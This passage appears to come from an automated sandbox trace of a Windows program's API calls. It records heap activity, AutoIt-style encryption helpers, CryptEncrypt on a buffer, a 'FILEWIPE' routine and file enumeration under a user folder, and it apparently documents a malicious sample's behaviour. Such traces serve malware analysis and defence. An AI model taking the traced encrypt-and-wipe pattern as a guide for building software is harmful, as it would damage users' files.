hHeap=0x770000) returned 1 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0034.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0034.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.052] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da298, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da298*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0034.052] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.052] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.052] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0034.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.052] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.052] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.052] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.052] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.052] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.053] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0034.053] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.053] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.053] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.053] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.053] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.053] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0034.053] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.053] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.053] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1271, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x1280) returned 1 [0034.053] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.053] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.053] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.053] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.053] CharLowerBuffW (in: lpsz="byte[4737]", cchLength=0xa | out: lpsz="byte[4737]") returned 0xa [0034.053] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.053] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.053] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.054] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.054] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.054] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x957518*, pdwDataLen=0x6ae220*=0x1271, dwBufLen=0x1280 | out: pbData=0x957518*, pdwDataLen=0x6ae220*=0x1280) returned 1 [0034.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.054] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0034.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.054] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.054] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.054] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0034.054] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.054] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.055] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.055] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0034.055] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.057] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.057] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.057] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.058] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.058] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.058] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0034.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.058] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.058] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.058] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0034.058] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.058] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0034.058] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.058] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.058] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0034.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.058] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.058] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.059] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.059] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0034.059] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.059] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.059] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0034.059] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0034.059] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0034.059] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.059] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.059] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.059] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.059] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.059] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.060] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.060] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0034.060] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.060] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0034.060] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.060] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0034.060] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.060] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0034.060] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.060] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0034.060] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.060] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.060] FreeLibrary (hLibModule=0x754b0000) returned 1 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0034.060] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0034.060] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.061] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.061] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.062] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.062] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.062] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0034.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0034.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.062] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.062] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 